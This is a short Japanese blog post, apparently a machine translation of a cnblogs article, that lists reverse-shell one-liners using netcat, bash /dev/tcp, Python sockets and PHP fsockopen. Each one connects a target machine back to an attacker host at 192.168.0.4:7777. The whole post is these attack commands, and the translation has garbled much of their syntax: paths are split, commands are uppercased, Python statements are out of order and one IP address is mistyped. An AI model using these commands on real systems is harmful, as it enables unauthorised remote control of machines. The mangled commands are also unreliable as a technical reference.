NCリバウンドシェルのいくつかの方法

ターゲット・システムのためのUbuntuの場合は、CentOSのサーバー

カーリー攻撃者のシステムとして、IP:192.168.0.4、ポート7777を開き、空いています

最終的にはUbuntuのある、CentOSのは、シェルはカーリーまで回復しました

前方リバウンドシェル

Ubuntuのまたは入力上のCentOS

NC -lVP 7777 -e / binに/ bashの

カーリー入力

NCのIP  7777

前方リバウンドは、シェルを回復し、カリを監視するために、NC、NC指令を実行するターゲット・マシンです。

NCをインストールするには、ターゲットマシンのニーズ。

逆リバウンドシェル

方法1:bashのリバウンド

bashの-i>&は/ dev / TCP / IP /ポート0 >&1

しかし、最初にあなたはカーリーのポートをリスニングNC使用する必要があります。

NC -lVP 7777

Ubuntuのに成功リバウンドはありません。この方法では、CentOSのは、成功をバウンスすることができます。

方法2:pythonのリバウンド

次のようにシェルコマンドをリバウンド:

-cパイソン" S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM); s.connect(( 'IP'、ポート)); os.dup2(s.fileno()、0インポートOS、ソケット、サブプロセス); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); P = subprocess.call([ '/ binに/ bashの'、 ' - I']); "

まず、カーリーのポートをリスニングNC:

NC -lVP 7777

PythonのUbuntuのCentOSのまたは入力に逆接続を使用する場合には:

-cパイソン" S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM); s.connect(( '192.168.0.4'、7777)); os.dup2(s.fileno()インポートOS、ソケット、サブプロセス、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); P = subprocess.call([ '/ binに/ bashの'、 ' - I']) ;

このメソッドは、UbuntuとLinuxが成功リバウンドです。

方法3

カーリーに聞いてNCまず入力:

NC -lVP 7777

NC逆接続やCentOSののUbuntuのは、次のコマンドでを使用するには:

NC -e / binに/ bashの192.1680.4  7777

方法4:PHPのシェルのリバウンド

カーリー入力で初:

NC -lVP 7777

そして、ターゲットマシン上で、次のコマンドを入力します。

php- ' のexec( "/ binに/ bashの-i>&/dev/tcp/192.168.0.4/7777")' 
PHPの -r " $靴下= fsockopenの( "192.168.0.4"、7777);のexec(" /ビン/ bashの-i 0>&3 1>&3 2>&3" )。"

これらのメソッドの注意リバウンドPHPのシェルは、PHPのセーフモードを必要としますが、exec関数を使用する前に、このオプションをオフに。

 

おすすめ

転載: www.cnblogs.com/-chenxs/p/11748488.html